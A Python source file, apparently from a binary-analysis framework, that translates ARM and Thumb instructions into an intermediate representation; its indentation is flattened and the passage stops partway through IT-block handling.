def negs(ir, instr, a, b):
return subs(ir, instr, a, ExprInt(0, b.size), b)
def bic(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
r = b & (c ^ ExprInt(-1, 32))
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def bics(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
tmp1, tmp2 = b, ~c
r = tmp1 & tmp2
e += [ExprAssign(zf, ExprOp('FLAG_EQ_AND', tmp1, tmp2))]
e += update_flag_nf(r)
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def sdiv(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
loc_div = ExprLoc(ir.loc_db.add_location(), ir.IRDst.size)
loc_except = ExprLoc(ir.loc_db.add_location(), ir.IRDst.size)
loc_next = ExprLoc(ir.get_next_loc_key(instr), ir.IRDst.size)
e.append(ExprAssign(ir.IRDst, ExprCond(c, loc_div, loc_except)))
do_except = []
do_except.append(ExprAssign(exception_flags, ExprInt(EXCEPT_DIV_BY_ZERO, exception_flags.size)))
do_except.append(ExprAssign(ir.IRDst, loc_next))
blk_except = IRBlock(loc_except.loc_key, [AssignBlock(do_except, instr)])
r = ExprOp("sdiv", b, c)
do_div = []
do_div.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
do_div.append(ExprAssign(ir.IRDst, r))
do_div.append(ExprAssign(ir.IRDst, loc_next))
blk_div = IRBlock(loc_div.loc_key, [AssignBlock(do_div, instr)])
return e, [blk_div, blk_except]
def udiv(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
loc_div = ExprLoc(ir.loc_db.add_location(), ir.IRDst.size)
loc_except = ExprLoc(ir.loc_db.add_location(), ir.IRDst.size)
loc_next = ExprLoc(ir.get_next_loc_key(instr), ir.IRDst.size)
e.append(ExprAssign(ir.IRDst, ExprCond(c, loc_div, loc_except)))
do_except = []
do_except.append(ExprAssign(exception_flags, ExprInt(EXCEPT_DIV_BY_ZERO, exception_flags.size)))
do_except.append(ExprAssign(ir.IRDst, loc_next))
blk_except = IRBlock(loc_except.loc_key, [AssignBlock(do_except, instr)])
r = ExprOp("udiv", b, c)
do_div = []
do_div.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
do_div.append(ExprAssign(ir.IRDst, r))
do_div.append(ExprAssign(ir.IRDst, loc_next))
blk_div = IRBlock(loc_div.loc_key, [AssignBlock(do_div, instr)])
return e, [blk_div, blk_except]
def mla(ir, instr, a, b, c, d):
e = []
r = (b * c) + d
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def mlas(ir, instr, a, b, c, d):
e = []
r = (b * c) + d
e += update_flag_zn(r)
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def mls(ir, instr, a, b, c, d):
e = []
r = d - (b * c)
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def mul(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
r = b * c
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def muls(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
r = b * c
e += update_flag_zn(r)
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def umull(ir, instr, a, b, c, d):
e = []
r = c.zeroExtend(64) * d.zeroExtend(64)
e.append(ExprAssign(a, r[0:32]))
e.append(ExprAssign(b, r[32:64]))
# r15/IRDst not allowed as output
return e, []
def umlal(ir, instr, a, b, c, d):
e = []
r = c.zeroExtend(64) * d.zeroExtend(64) + ExprCompose(a, b)
e.append(ExprAssign(a, r[0:32]))
e.append(ExprAssign(b, r[32:64]))
# r15/IRDst not allowed as output
return e, []
def smull(ir, instr, a, b, c, d):
e = []
r = c.signExtend(64) * d.signExtend(64)
e.append(ExprAssign(a, r[0:32]))
e.append(ExprAssign(b, r[32:64]))
# r15/IRDst not allowed as output
return e, []
def smlal(ir, instr, a, b, c, d):
e = []
r = c.signExtend(64) * d.signExtend(64) + ExprCompose(a, b)
e.append(ExprAssign(a, r[0:32]))
e.append(ExprAssign(b, r[32:64]))
# r15/IRDst not allowed as output
return e, []
def b(ir, instr, a):
e = []
e.append(ExprAssign(PC, a))
e.append(ExprAssign(ir.IRDst, a))
return e, []
def bl(ir, instr, a):
e = []
l = ExprInt(instr.offset + instr.l, 32)
e.append(ExprAssign(PC, a))
e.append(ExprAssign(ir.IRDst, a))
e.append(ExprAssign(LR, l))
return e, []
def bx(ir, instr, a):
e = []
e.append(ExprAssign(PC, a))
e.append(ExprAssign(ir.IRDst, a))
return e, []
def blx(ir, instr, a):
e = []
l = ExprInt(instr.offset + instr.l, 32)
e.append(ExprAssign(PC, a))
e.append(ExprAssign(ir.IRDst, a))
e.append(ExprAssign(LR, l))
return e, []
def st_ld_r(ir, instr, a, a2, b, store=False, size=32, s_ext=False, z_ext=False):
e = []
wb = False
postinc = False
b = b.ptr
if isinstance(b, ExprOp):
if b.op == "wback":
wb = True
b = b.args[0]
if b.op == "postinc":
postinc = True
if isinstance(b, ExprOp) and b.op in ["postinc", 'preinc']:
# XXX TODO CHECK
base, off = b.args[0], b.args[1] # ExprInt(size/8, 32)
else:
base, off = b, ExprInt(0, 32)
if postinc:
ad = base
else:
ad = base + off
    # PC-relative addressing uses the PC aligned down to 4 bytes
ad = ad.replace_expr({PC: PC & ExprInt(0xFFFFFFFC, 32)})
dmem = False
if size in [8, 16]:
if store:
a = a[:size]
m = ExprMem(ad, size=size)
elif s_ext:
m = ExprMem(ad, size=size).signExtend(a.size)
elif z_ext:
m = ExprMem(ad, size=size).zeroExtend(a.size)
else:
raise ValueError('unhandled case')
elif size == 32:
m = ExprMem(ad, size=size)
elif size == 64:
assert a2 is not None
m = ExprMem(ad, size=32)
dmem = True
size = 32
else:
raise ValueError('the size DOES matter')
dst = None
if store:
e.append(ExprAssign(m, a))
if dmem:
e.append(ExprAssign(ExprMem(ad + ExprInt(4, 32), size=size), a2))
else:
if a == PC:
dst = PC
e.append(ExprAssign(ir.IRDst, m))
e.append(ExprAssign(a, m))
if dmem:
e.append(ExprAssign(a2, ExprMem(ad + ExprInt(4, 32), size=size)))
    # XXX TODO check multiple writes caused by wb
if wb or postinc:
e.append(ExprAssign(base, base + off))
return e, []
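# Illustrative sketch (not from the original source): for a write-back load
# such as "LDR R0, [R1, #4]!", the address is wrapped in ExprOp("wback", ...),
# so st_ld_r roughly produces:
#   R0 = @32[R1 + 4]     (the load itself)
#   R1 = R1 + 4          (write-back of the updated base)
# For the post-indexed form "LDR R0, [R1], #4" the access uses the original
# base instead: R0 = @32[R1], then R1 = R1 + 4.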
def ldr(ir, instr, a, b):
return st_ld_r(ir, instr, a, None, b, store=False)
def ldrd(ir, instr, a, b, c=None):
if c is None:
a2 = ir.arch.regs.all_regs_ids[ir.arch.regs.all_regs_ids.index(a) + 1]
else:
a2 = b
b = c
return st_ld_r(ir, instr, a, a2, b, store=False, size=64)
def l_str(ir, instr, a, b):
return st_ld_r(ir, instr, a, None, b, store=True)
def l_strd(ir, instr, a, b, c=None):
if c is None:
a2 = ir.arch.regs.all_regs_ids[ir.arch.regs.all_regs_ids.index(a) + 1]
else:
a2 = b
b = c
return st_ld_r(ir, instr, a, a2, b, store=True, size=64)
def ldrb(ir, instr, a, b):
return st_ld_r(ir, instr, a, None, b, store=False, size=8, z_ext=True)
def ldrsb(ir, instr, a, b):
return st_ld_r(ir, instr, a, None, b, store=False, size=8, s_ext=True, z_ext=False)
def strb(ir, instr, a, b):
return st_ld_r(ir, instr, a, None, b, store=True, size=8)
def ldrh(ir, instr, a, b):
return st_ld_r(ir, instr, a, None, b, store=False, size=16, z_ext=True)
def strh(ir, instr, a, b):
return st_ld_r(ir, instr, a, None, b, store=True, size=16, z_ext=True)
def ldrsh(ir, instr, a, b):
return st_ld_r(ir, instr, a, None, b, store=False, size=16, s_ext=True, z_ext=False)
def st_ld_m(ir, instr, a, b, store=False, postinc=False, updown=False):
e = []
wb = False
dst = None
if isinstance(a, ExprOp) and a.op == 'wback':
wb = True
a = a.args[0]
if isinstance(b, ExprOp) and b.op == 'sbit':
b = b.args[0]
regs = b.args
base = a
if updown:
step = 4
else:
step = -4
regs = regs[::-1]
if postinc:
pass
else:
base += ExprInt(step, 32)
for i, r in enumerate(regs):
ad = base + ExprInt(i * step, 32)
if store:
e.append(ExprAssign(ExprMem(ad, 32), r))
else:
e.append(ExprAssign(r, ExprMem(ad, 32)))
if r == PC:
e.append(ExprAssign(ir.IRDst, ExprMem(ad, 32)))
    # XXX TODO check multiple writes caused by wb
if wb:
if postinc:
e.append(ExprAssign(a, base + ExprInt(len(regs) * step, 32)))
else:
e.append(ExprAssign(a, base + ExprInt((len(regs) - 1) * step, 32)))
if store:
pass
else:
assert(isinstance(b, ExprOp) and b.op == "reglist")
return e, []
def ldmia(ir, instr, a, b):
return st_ld_m(ir, instr, a, b, store=False, postinc=True, updown=True)
def ldmib(ir, instr, a, b):
return st_ld_m(ir, instr, a, b, store=False, postinc=False, updown=True)
def ldmda(ir, instr, a, b):
return st_ld_m(ir, instr, a, b, store=False, postinc=True, updown=False)
def ldmdb(ir, instr, a, b):
return st_ld_m(ir, instr, a, b, store=False, postinc=False, updown=False)
def stmia(ir, instr, a, b):
return st_ld_m(ir, instr, a, b, store=True, postinc=True, updown=True)
def stmib(ir, instr, a, b):
return st_ld_m(ir, instr, a, b, store=True, postinc=False, updown=True)
def stmda(ir, instr, a, b):
return st_ld_m(ir, instr, a, b, store=True, postinc=True, updown=False)
def stmdb(ir, instr, a, b):
return st_ld_m(ir, instr, a, b, store=True, postinc=False, updown=False)
def svc(ir, instr, a):
e = []
except_int = EXCEPT_INT_XX
e.append(ExprAssign(exception_flags, ExprInt(except_int, 32)))
e.append(ExprAssign(interrupt_num, a))
return e, []
def und(ir, instr, a, b):
# XXX TODO implement
e = []
return e, []
# TODO XXX implement correct CF for shifters
def lsr(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
r = b >> c
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def lsrs(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
r = b >> c
e.append(ExprAssign(a, r))
e += [ExprAssign(zf, ExprOp('FLAG_EQ', r))]
e += update_flag_nf(r)
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def asr(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
r = ExprOp("a>>", b, c)
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def asrs(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
r = ExprOp("a>>", b, c)
e.append(ExprAssign(a, r))
e += [ExprAssign(zf, ExprOp('FLAG_EQ', r))]
e += update_flag_nf(r)
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def lsl(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
r = b << c
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def lsls(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
r = b << c
e.append(ExprAssign(a, r))
e += [ExprAssign(zf, ExprOp('FLAG_EQ', r))]
e += update_flag_nf(r)
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def rors(ir, instr, a, b):
e = []
r = ExprOp(">>>", a, b)
e.append(ExprAssign(a, r))
e += [ExprAssign(zf, ExprOp('FLAG_EQ', r))]
e += update_flag_nf(r)
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def push(ir, instr, a):
e = []
regs = list(a.args)
for i in range(len(regs)):
r = SP + ExprInt(-4 * len(regs) + 4 * i, 32)
e.append(ExprAssign(ExprMem(r, 32), regs[i]))
r = SP + ExprInt(-4 * len(regs), 32)
e.append(ExprAssign(SP, r))
return e, []
def pop(ir, instr, a):
e = []
regs = list(a.args)
dst = None
for i in range(len(regs)):
r = SP + ExprInt(4 * i, 32)
e.append(ExprAssign(regs[i], ExprMem(r, 32)))
if regs[i] == ir.pc:
dst = ExprMem(r, 32)
r = SP + ExprInt(4 * len(regs), 32)
e.append(ExprAssign(SP, r))
if dst is not None:
e.append(ExprAssign(ir.IRDst, dst))
return e, []
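# Illustrative sketch (not from the original source): "POP {R0, PC}" roughly
# expands to:
#   R0 = @32[SP]
#   PC = @32[SP + 4]
#   SP = SP + 8
#   IRDst = @32[SP + 4]   (control transfer, since PC is in the list)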
def cbz(ir, instr, a, b):
e = []
loc_next = ir.get_next_loc_key(instr)
loc_next_expr = ExprLoc(loc_next, 32)
e.append(ExprAssign(ir.IRDst, ExprCond(a, loc_next_expr, b)))
return e, []
def cbnz(ir, instr, a, b):
e = []
loc_next = ir.get_next_loc_key(instr)
loc_next_expr = ExprLoc(loc_next, 32)
e.append(ExprAssign(ir.IRDst, ExprCond(a, b, loc_next_expr)))
return e, []
def uxtb(ir, instr, a, b):
e = []
r = b[:8].zeroExtend(32)
e.append(ExprAssign(a, r))
dst = None
if PC in a.get_r():
dst = PC
e.append(ExprAssign(ir.IRDst, r))
return e, []
def uxth(ir, instr, a, b):
e = []
r = b[:16].zeroExtend(32)
e.append(ExprAssign(a, r))
dst = None
if PC in a.get_r():
dst = PC
e.append(ExprAssign(ir.IRDst, r))
return e, []
def sxtb(ir, instr, a, b):
e = []
r = b[:8].signExtend(32)
e.append(ExprAssign(a, r))
dst = None
if PC in a.get_r():
dst = PC
e.append(ExprAssign(ir.IRDst, r))
return e, []
def sxth(ir, instr, a, b):
e = []
r = b[:16].signExtend(32)
e.append(ExprAssign(a, r))
dst = None
if PC in a.get_r():
dst = PC
e.append(ExprAssign(ir.IRDst, r))
return e, []
def ubfx(ir, instr, a, b, c, d):
e = []
c = int(c)
d = int(d)
r = b[c:c+d].zeroExtend(32)
e.append(ExprAssign(a, r))
dst = None
if PC in a.get_r():
dst = PC
e.append(ExprAssign(ir.IRDst, r))
return e, []
def bfc(ir, instr, a, b, c):
e = []
start = int(b)
stop = start + int(c)
out = []
last = 0
if start:
out.append(a[:start])
last = start
if stop - start:
out.append(ExprInt(0, 32)[last:stop])
last = stop
if last < 32:
out.append(a[last:])
r = ExprCompose(*out)
e.append(ExprAssign(a, r))
dst = None
if PC in a.get_r():
dst = PC
e.append(ExprAssign(ir.IRDst, r))
return e, []
def pld(ir, instr, a):
e = []
return e, []
def pldw(ir, instr, a):
e = []
return e, []
def clz(ir, instr, a, b):
e = []
e.append(ExprAssign(a, ExprOp('cntleadzeros', b)))
return e, []
def uxtab(ir, instr, a, b, c):
e = []
e.append(ExprAssign(a, b + (c & ExprInt(0xff, 32))))
return e, []
def uxtah(ir, instr, a, b, c):
e = []
e.append(ExprAssign(a, b + (c & ExprInt(0xffff, 32))))
return e, []
def bkpt(ir, instr, a):
e = []
e.append(ExprAssign(exception_flags, ExprInt(EXCEPT_SOFT_BP, 32)))
e.append(ExprAssign(bp_num, a))
return e, []
def _extract_s16(arg, part):
if part == 'B': # bottom 16 bits
return arg[0:16]
elif part == 'T': # top 16 bits
return arg[16:32]
def smul(ir, instr, a, b, c):
e = []
e.append(ExprAssign(a, _extract_s16(b, instr.name[4]).signExtend(32) * _extract_s16(c, instr.name[5]).signExtend(32)))
return e, []
def smulw(ir, instr, a, b, c):
    e = []
    # keep the signed most significant 32 bits of the 48-bit product
    prod = b.signExtend(48) * _extract_s16(c, instr.name[5]).signExtend(48)
    e.append(ExprAssign(a, prod[16:48]))
    return e, []
def tbb(ir, instr, a):
e = []
dst = PC + ExprInt(2, 32) * a.zeroExtend(32)
e.append(ExprAssign(PC, dst))
e.append(ExprAssign(ir.IRDst, dst))
return e, []
def tbh(ir, instr, a):
e = []
dst = PC + ExprInt(2, 32) * a.zeroExtend(32)
e.append(ExprAssign(PC, dst))
e.append(ExprAssign(ir.IRDst, dst))
return e, []
def smlabb(ir, instr, a, b, c, d):
e = []
result = (b[:16].signExtend(32) * c[:16].signExtend(32)) + d
e.append(ExprAssign(a, result))
return e, []
def smlabt(ir, instr, a, b, c, d):
e = []
result = (b[:16].signExtend(32) * c[16:32].signExtend(32)) + d
e.append(ExprAssign(a, result))
return e, []
def smlatb(ir, instr, a, b, c, d):
e = []
result = (b[16:32].signExtend(32) * c[:16].signExtend(32)) + d
e.append(ExprAssign(a, result))
return e, []
def smlatt(ir, instr, a, b, c, d):
e = []
result = (b[16:32].signExtend(32) * c[16:32].signExtend(32)) + d
e.append(ExprAssign(a, result))
return e, []
def uadd8(ir, instr, a, b, c):
e = []
sums = []
ges = []
for i in range(0, 32, 8):
sums.append(b[i:i+8] + c[i:i+8])
ges.append((b[i:i+8].zeroExtend(9) + c[i:i+8].zeroExtend(9))[8:9])
e.append(ExprAssign(a, ExprCompose(*sums)))
for i, value in enumerate(ges):
e.append(ExprAssign(ge_regs[i], value))
return e, []
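# Illustrative sketch (not from the original source): uadd8 adds the four byte
# lanes independently and stores each lane's carry-out in GE[0..3]. For
# example, with b = 0x000000FF and c = 0x00000001, lane 0 produces sum byte
# 0x00 with carry-out 1, so GE[0] = 1 while the other GE bits are 0.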
def sel(ir, instr, a, b, c):
e = []
cond = nf ^ of ^ ExprInt(1, 1)
parts = []
for i in range(4):
parts.append(ExprCond(ge_regs[i], b[i*8:(i+1)*8], c[i*8:(i+1)*8]))
result = ExprCompose(*parts)
e.append(ExprAssign(a, result))
return e, []
def rev(ir, instr, a, b):
e = []
result = ExprCompose(b[24:32], b[16:24], b[8:16], b[:8])
e.append(ExprAssign(a, result))
return e, []
def rev16(ir, instr, a, b):
e = []
result = ExprCompose(b[8:16], b[:8], b[24:32], b[16:24])
e.append(ExprAssign(a, result))
return e, []
def nop(ir, instr):
e = []
return e, []
def dsb(ir, instr, a):
# XXX TODO
e = []
return e, []
def cpsie(ir, instr, a):
# XXX TODO
e = []
return e, []
def cpsid(ir, instr, a):
# XXX TODO
e = []
return e, []
def wfe(ir, instr):
# XXX TODO
e = []
return e, []
def wfi(ir, instr):
# XXX TODO
e = []
return e, []
def adr(ir, instr, arg1, arg2):
e = []
e.append(ExprAssign(arg1, (PC & ExprInt(0xfffffffc, 32)) + arg2))
return e, []
def pkhbt(ir, instr, arg1, arg2, arg3):
e = []
e.append(
ExprAssign(
arg1,
ExprCompose(
arg2[:16],
arg3[16:]
)
)
)
return e, []
def pkhtb(ir, instr, arg1, arg2, arg3):
e = []
e.append(
ExprAssign(
arg1,
ExprCompose(
arg3[:16],
arg2[16:]
)
)
)
return e, []
COND_EQ = 0
COND_NE = 1
COND_CS = 2
COND_CC = 3
COND_MI = 4
COND_PL = 5
COND_VS = 6
COND_VC = 7
COND_HI = 8
COND_LS = 9
COND_GE = 10
COND_LT = 11
COND_GT = 12
COND_LE = 13
COND_AL = 14
COND_NV = 15
cond_dct = {
COND_EQ: "EQ",
COND_NE: "NE",
COND_CS: "CS",
COND_CC: "CC",
COND_MI: "MI",
COND_PL: "PL",
COND_VS: "VS",
COND_VC: "VC",
COND_HI: "HI",
COND_LS: "LS",
COND_GE: "GE",
COND_LT: "LT",
COND_GT: "GT",
COND_LE: "LE",
COND_AL: "AL",
# COND_NV: "NV",
}
cond_dct_inv = dict((name, num) for num, name in viewitems(cond_dct))
"""
Code Meaning (for cmp or subs) Flags Tested
eq Equal. Z==1
ne Not equal. Z==0
cs or hs Unsigned higher or same (or carry set). C==1
cc or lo Unsigned lower (or carry clear). C==0
mi Negative. The mnemonic stands for "minus". N==1
pl Positive or zero. The mnemonic stands for "plus". N==0
vs Signed overflow. The mnemonic stands for "V set". V==1
vc No signed overflow. The mnemonic stands for "V clear". V==0
hi Unsigned higher. (C==1) && (Z==0)
ls Unsigned lower or same. (C==0) || (Z==1)
ge Signed greater than or equal. N==V
lt Signed less than. N!=V
gt Signed greater than. (Z==0) && (N==V)
le Signed less than or equal. (Z==1) || (N!=V)
al (or omitted) Always executed. None tested.
"""
tab_cond = {COND_EQ: ExprOp("CC_EQ", zf),
COND_NE: ExprOp("CC_NE", zf),
COND_CS: ExprOp("CC_U>=", cf ^ ExprInt(1, 1)), # inv cf
COND_CC: ExprOp("CC_U<", cf ^ ExprInt(1, 1)), # inv cf
COND_MI: ExprOp("CC_NEG", nf),
COND_PL: ExprOp("CC_POS", nf),
COND_VS: ExprOp("CC_sOVR", of),
COND_VC: ExprOp("CC_sNOOVR", of),
COND_HI: ExprOp("CC_U>", cf ^ ExprInt(1, 1), zf), # inv cf
COND_LS: ExprOp("CC_U<=", cf ^ ExprInt(1, 1), zf), # inv cf
COND_GE: ExprOp("CC_S>=", nf, of),
COND_LT: ExprOp("CC_S<", nf, of),
COND_GT: ExprOp("CC_S>", nf, of, zf),
COND_LE: ExprOp("CC_S<=", nf, of, zf),
}
def is_pc_written(ir, instr_ir):
    all_pc = viewvalues(ir.mn.pc)
    for assignblk in instr_ir:
        if assignblk.dst in all_pc:
            return True, assignblk.dst
    return False, None
def add_condition_expr(ir, instr, cond, instr_ir, extra_ir):
if cond == COND_AL:
return instr_ir, extra_ir
    if cond not in tab_cond:
raise ValueError('unknown condition %r' % cond)
cond = tab_cond[cond]
loc_next = ir.get_next_loc_key(instr)
loc_next_expr = ExprLoc(loc_next, 32)
loc_do = ir.loc_db.add_location()
loc_do_expr = ExprLoc(loc_do, 32)
dst_cond = ExprCond(cond, loc_do_expr, loc_next_expr)
assert(isinstance(instr_ir, list))
has_irdst = False
for e in instr_ir:
if e.dst == ir.IRDst:
has_irdst = True
break
if not has_irdst:
instr_ir.append(ExprAssign(ir.IRDst, loc_next_expr))
e_do = IRBlock(loc_do, [AssignBlock(instr_ir, instr)])
e = [ExprAssign(ir.IRDst, dst_cond)]
return e, [e_do] + extra_ir
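# Illustrative sketch (not from the original source): for a conditional
# instruction such as "MOVEQ R0, R1", add_condition_expr rewrites the IR into
# a small diamond:
#   current block : IRDst = CC_EQ(zf) ? loc_do : loc_next
#   loc_do block  : R0 = R1 ; IRDst = loc_next   (appended if missing)
# so the assignment only happens on the taken path.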
mnemo_func = {}
mnemo_func_cond = {}
mnemo_condm0 = {'add': add,
'sub': sub,
'eor': eor,
'and': l_and,
'rsb': rsb,
'adc': adc,
'sbc': sbc,
'rsc': rsc,
'tst': tst,
'teq': teq,
'cmp': l_cmp,
'cmn': cmn,
'orr': orr,
'mov': mov,
'movt': movt,
'bic': bic,
'mvn': mvn,
'neg': neg,
'sdiv': sdiv,
'udiv': udiv,
'mul': mul,
'umull': umull,
'umlal': umlal,
'smull': smull,
'smlal': smlal,
'mla': mla,
'ldr': ldr,
'ldrd': ldrd,
'ldrsb': ldrsb,
'str': l_str,
'strd': l_strd,
'b': b,
'bl': bl,
'svc': svc,
'und': und,
'bx': bx,
'ldrh': ldrh,
'strh': strh,
'ldrsh': ldrsh,
'ldsh': ldrsh,
'uxtb': uxtb,
'uxth': uxth,
'sxtb': sxtb,
'sxth': sxth,
'ubfx': ubfx,
'bfc': bfc,
'rev': rev,
'rev16': rev16,
'clz': clz,
'uxtab': uxtab,
'uxtah': uxtah,
'bkpt': bkpt,
'smulbb': smul,
'smulbt': smul,
'smultb': smul,
'smultt': smul,
'smulwt': smulw,
'smulwb': smulw,
'pkhtb': pkhtb,
'pkhbt': pkhbt,
}
mnemo_condm1 = {'adds': add,
'subs': subs,
'eors': eors,
'ands': l_and,
'rsbs': rsbs,
'adcs': adc,
'sbcs': sbcs,
'rscs': rscs,
'orrs': orrs,
'movs': movs,
'bics': bics,
'mvns': mvns,
'mrs': mrs,
'msr': msr,
'negs': negs,
'muls': muls,
'mls': mls,
'mlas': mlas,
'blx': blx,
'ldrb': ldrb,
'ldsb': ldrsb,
'strb': strb,
}
mnemo_condm2 = {'ldmia': ldmia,
'ldmib': ldmib,
'ldmda': ldmda,
'ldmdb': ldmdb,
'ldmfa': ldmda,
'ldmfd': ldmia,
'ldmea': ldmdb,
'ldmed': ldmib, # XXX
'stmia': stmia,
'stmib': stmib,
'stmda': stmda,
'stmdb': stmdb,
'stmfa': stmib,
'stmed': stmda,
'stmfd': stmdb,
'stmea': stmia,
}
mnemo_nocond = {'lsr': lsr,
'lsrs': lsrs,
'lsl': lsl,
'lsls': lsls,
'rors': rors,
'push': push,
'pop': pop,
'asr': asr,
'asrs': asrs,
'cbz': cbz,
'cbnz': cbnz,
'pld': pld,
'pldw': pldw,
'tbb': tbb,
'tbh': tbh,
'nop': nop,
'dsb': dsb,
'cpsie': cpsie,
'cpsid': cpsid,
'wfe': wfe,
'wfi': wfi,
'adr': adr,
'orn': orn,
'smlabb': smlabb,
'smlabt': smlabt,
'smlatb': smlatb,
'smlatt': smlatt,
'uadd8': uadd8,
'sel': sel,
}
mn_cond_x = [mnemo_condm0,
mnemo_condm1,
mnemo_condm2]
for index, mn_base in enumerate(mn_cond_x):
for mn, mf in viewitems(mn_base):
for cond, cn in viewitems(cond_dct):
if cond == COND_AL:
cn = ""
cn = cn.lower()
if index == 0:
mn_mod = mn + cn
else:
mn_mod = mn[:-index] + cn + mn[-index:]
# print mn_mod
mnemo_func_cond[mn_mod] = cond, mf
for name, mf in viewitems(mnemo_nocond):
mnemo_func_cond[name] = COND_AL, mf
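# Illustrative examples (not from the original source) of the names generated
# above: for index 0 the condition is appended ('add' -> 'addeq'); for index 1
# and 2 it is inserted before the last 1 or 2 characters ('adds' -> 'addeqs',
# 'ldmia' -> 'ldmeqia'). COND_AL maps to the bare mnemonic.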
def split_expr_dst(ir, instr_ir):
out = []
dst = None
for i in instr_ir:
if i.dst == ir.pc:
out.append(i)
dst = ir.pc # i.src
else:
out.append(i)
return out, dst
def get_mnemo_expr(ir, instr, *args):
if not instr.name.lower() in mnemo_func_cond:
raise ValueError('unknown mnemo %s' % instr)
cond, mf = mnemo_func_cond[instr.name.lower()]
instr_ir, extra_ir = mf(ir, instr, *args)
    instr_ir, extra_ir = add_condition_expr(ir, instr, cond, instr_ir, extra_ir)
    return instr_ir, extra_ir
get_arm_instr_expr = get_mnemo_expr
class arminfo(object):
mode = "arm"
# offset
class ir_arml(IntermediateRepresentation):
def __init__(self, loc_db=None):
IntermediateRepresentation.__init__(self, mn_arm, "l", loc_db)
self.pc = PC
self.sp = SP
self.IRDst = ExprId('IRDst', 32)
self.addrsize = 32
def mod_pc(self, instr, instr_ir, extra_ir):
# fix PC (+8 for arm)
pc_fixed = {self.pc: ExprInt(instr.offset + 8, 32)}
for i, expr in enumerate(instr_ir):
dst, src = expr.dst, expr.src
if dst != self.pc:
dst = dst.replace_expr(pc_fixed)
src = src.replace_expr(pc_fixed)
instr_ir[i] = ExprAssign(dst, src)
for idx, irblock in enumerate(extra_ir):
extra_ir[idx] = irblock.modify_exprs(lambda expr: expr.replace_expr(pc_fixed) \
if expr != self.pc else expr,
lambda expr: expr.replace_expr(pc_fixed))
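    # Illustrative example (not from the original source): for an ARM
    # instruction at offset 0x1000, every read of PC in the IR above is
    # rewritten to ExprInt(0x1008, 32), matching the architectural rule that
    # PC reads as the instruction address + 8.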
def get_ir(self, instr):
args = instr.args
# ir = get_mnemo_expr(self, self.name.lower(), *args)
if len(args) and isinstance(args[-1], ExprOp):
if args[-1].op == 'rrx':
args[-1] = ExprCompose(args[-1].args[0][1:], cf)
elif (args[-1].op in ['<<', '>>', '<<a', 'a>>', '<<<', '>>>'] and
isinstance(args[-1].args[-1], ExprId)):
args[-1] = ExprOp(args[-1].op,
args[-1].args[0],
args[-1].args[-1][:8].zeroExtend(32))
instr_ir, extra_ir = get_mnemo_expr(self, instr, *args)
self.mod_pc(instr, instr_ir, extra_ir)
return instr_ir, extra_ir
def parse_itt(self, instr):
name = instr.name
assert name.startswith('IT')
name = name[1:]
out = []
for hint in name:
if hint == 'T':
out.append(0)
elif hint == "E":
out.append(1)
else:
raise ValueError("IT name invalid %s" % instr)
return out, instr.args[0]
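    # Illustrative example (not from the original source): for "ITTE EQ",
    # name[1:] is "TTE", so parse_itt returns ([0, 0, 1], <EQ arg>): the next
    # three instructions execute on EQ, EQ and NE respectively (the leading
    # 'T' is the one implied by IT itself).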
def do_it_block(self, loc, index, block, assignments, gen_pc_updt):
instr = block.lines[index]
it_hints, it_cond = self.parse_itt(instr)
cond_num = cond_dct_inv[it_cond.name]
cond_eq = tab_cond[cond_num]
if not index + len(it_hints) <= len(block.lines):
raise NotImplementedError("Split IT block non supported yet")
ir_blocks_all = []
# Gen dummy irblock for IT instr
loc_next = self.get_next_loc_key(instr)
dst = ExprAssign(self.IRDst, ExprLoc(loc_next, 32))
dst_blk = AssignBlock([dst], instr)
assignments.append(dst_blk)
irblock = IRBlock(loc, assignments)
ir_blocks_all.append([irblock])
loc = loc_next
assignments = []
for hint in it_hints:
irblocks = []
index += 1
instr = block.lines[index]
            # Add a conditional jump to the current irblock
loc_do = self.loc_db.add_location()
loc_next = self.get_next_loc_key(instr)
if hint:
local_cond = ~cond_eq
else:
local_cond = cond_eq
dst = ExprAssign(self.IRDst, ExprCond(local_cond, ExprLoc(loc_do, 32), ExprLoc(loc_next, 32)))
dst_blk = AssignBlock([dst], instr)
assignments.append(dst_blk)
irblock = IRBlock(loc, assignments)
irblocks.append(irblock)
it_instr_irblocks = []
assignments = []
loc = loc_do
